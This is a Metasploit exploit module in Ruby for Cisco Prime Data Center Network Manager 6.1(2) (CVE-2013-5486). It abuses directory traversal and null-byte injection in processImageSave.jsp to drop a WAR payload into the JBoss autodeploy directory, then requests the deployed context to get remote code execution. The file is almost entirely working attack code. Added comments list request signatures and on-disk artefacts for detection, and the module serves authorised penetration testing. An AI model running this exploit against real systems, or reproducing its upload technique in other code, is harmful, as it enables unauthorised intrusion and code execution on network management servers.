GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/cisco_dcnm_upload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
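class MetasploitModule < Msf::Exploit::Remote
  # Cisco Prime Data Center Network Manager 6.1(2) arbitrary file upload
  # (CVE-2013-5486 / ZDI-13-254).
  #
  # Flow, as implemented below:
  #   1. #upload_file POSTs to cues_utility/charts/processImageSave.jsp with a
  #      `chartid` that combines a directory traversal (target 'AutoDeployPath')
  #      with a trailing literal "%00" (the null-byte injection from the
  #      description), so the base64 `data` body is stored as <app_base>.war
  #      inside the JBoss autodeploy directory.
  #   2. #exploit then polls GET /<app_base>/<random letters> every 2 s for up
  #      to ATTEMPTS rounds until JBoss has deployed the WAR and answers 200.
  #
  # Detection / response notes grounded in this code:
  #   * Request signature: POST .../cues_utility/charts/processImageSave.jsp
  #     with mode=save, savefile=true and a chartid containing "../" and
  #     "%00" ('encode_params' is disabled, so both appear verbatim on the wire).
  #   * Host artefact: a 4-31 character alphanumeric <name>.war under
  #     jboss-4.2.2.GA/server/fm/deploy (target 'CleanupPath'). The file is
  #     registered with FileDropper for removal, so its absence afterwards is
  #     not proof the upload never happened.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata, the single target definition and the user-tunable options.
  #
  # @param info [Hash] extra metadata merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
      'Description' => %q{
        This module exploits a code execution flaw in Cisco Data Center Network Manager. The
        vulnerability exists in processImageSave.jsp, which can be abused through a directory
        traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
        application server feature is used to achieve remote code execution. This module has been
        tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
        (64 bits).
      },
      'Author' => [
        'rgod <rgod[at]autistici.org>', # Vulnerability discovery
        'juan vazquez' # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2013-5486' ],
        [ 'OSVDB', '97426' ],
        [ 'ZDI', '13-254' ],
        [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
      ],
      'Privileged' => true,
      'Platform' => 'java',
      'Arch' => ARCH_JAVA,
      'Targets' => [
        [ 'Cisco DCNM 6.1(2) / Java Universal',
          {
            # Traversal relative to the upload directory (see the path comments in #exploit).
            'AutoDeployPath' => "../../../../../deploy",
            # Where the dropped WAR lands on disk; used only for FileDropper cleanup.
            'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2013-09-18'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
        OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
      ])
  end

  # Stores +contents+ under +location+/+filename+ through processImageSave.jsp.
  #
  # 'encode_params' is false so the traversal and the trailing "%00" in
  # chartid reach the server untouched; +contents+ is therefore base64- and
  # URL-encoded by hand.
  #
  # @param location [String] traversal path relative to the upload directory
  # @param filename [String] name the file is stored under
  # @param contents [String] raw bytes to store
  # @return [Boolean] true only for an HTTP 200 whose body contains "success"
  def upload_file(location, filename, contents)
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
        'method' => 'POST',
        'encode_params' => false,
        'vars_post' =>
          {
            "mode" => "save",
            "savefile" => "true",
            # NOTE(review): +filename+ is interpolated here; the listing showed
            # a mangled "#(unknown)" and left the parameter unused.
            "chartid" => "#{location}/#{filename}%00",
            "data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
          }
      })

    !res.nil? && res.code == 200 && res.body.to_s.include?('success')
  end

  # Fingerprints the DCNM landing page at TARGETURI.
  #
  # @return [Exploit::CheckCode] Unknown when nothing answers, Appears when a
  #   "Version: 6.1..." banner is seen, Detected for any other DCNM banner,
  #   Safe otherwise
  def check
    res = send_request_cgi({
      # 'uri' is the key send_request_cgi honours; the original passed 'url',
      # which is not a request option, so TARGETURI was never applied here.
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    unless res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    body = res.body.to_s
    return Exploit::CheckCode::Safe unless res.code == 200 && body =~ /Data Center Network Manager/

    version_match = body.match(%r{<div class="productVersion">Version: (.*)</div>})
    return Exploit::CheckCode::Detected unless version_match

    version = version_match[1]
    vprint_status("Cisco Prime Data Center Network Manager version #{version} found")
    return Exploit::CheckCode::Appears if version =~ /6\.1/

    Exploit::CheckCode::Detected
  end

  # Uploads the WAR payload into the autodeploy directory, then polls the new
  # web context until JBoss has deployed it or ATTEMPTS is exhausted.
  #
  # Aborts via fail_with: BadConfig (ATTEMPTS < 1), Unknown (upload not
  # acknowledged), TimeoutExpired (no answer while polling).
  def exploit
    attempts = datastore['ATTEMPTS']
    fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0

    # Random context name (4..31 alphanumerics); doubles as the WAR basename.
    app_base = rand_text_alphanumeric(4 + rand(28))

    # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
    # Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
    # Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
    war = payload.encoded_war({ :app_name => app_base }).to_s
    war_filename = "#{app_base}.war"
    war_location = target['AutoDeployPath']

    print_status("Uploading WAR file #{war_filename}...")
    unless upload_file(war_location, war_filename, war)
      fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
    end
    # Hand the dropped WAR to FileDropper so it is removed during cleanup.
    register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")

    attempts.times do
      # Give JBoss time to notice and deploy the new WAR before probing it.
      Rex.sleep(2)

      # Request the freshly deployed context to trigger the payload.
      print_status("Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8) + 8)),
        'method' => 'GET'
      })
      # Failure. The request timed out or the server went away.
      fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
      # A 200 means the context is live; the payload has run and a session should follow.
      break if res.code == 200
    end
  end
end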